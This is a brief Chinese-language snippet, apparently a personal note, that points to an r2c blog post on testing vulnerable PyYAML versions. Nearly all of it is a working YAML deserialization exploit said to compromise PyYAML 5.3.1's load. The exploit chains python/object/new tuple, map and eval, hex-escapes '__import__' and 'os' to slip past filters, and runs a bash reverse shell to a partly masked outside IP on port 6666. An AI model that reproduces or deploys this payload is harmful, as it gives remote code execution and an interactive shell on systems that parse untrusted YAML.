里面有个不错的exp
r2c blog — Fully loaded: testing vulnerable PyYAML versions
5.3.1 load可杀:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- [ "\\x5f\\x5fimport\\x5f\\x5f('\\x6fs')\\x2esystem('bash -c \\"bash -i >& /dev/tcp/43\\x2exx\\x2exx\\x2exx/6666 0>&1\\"')" ]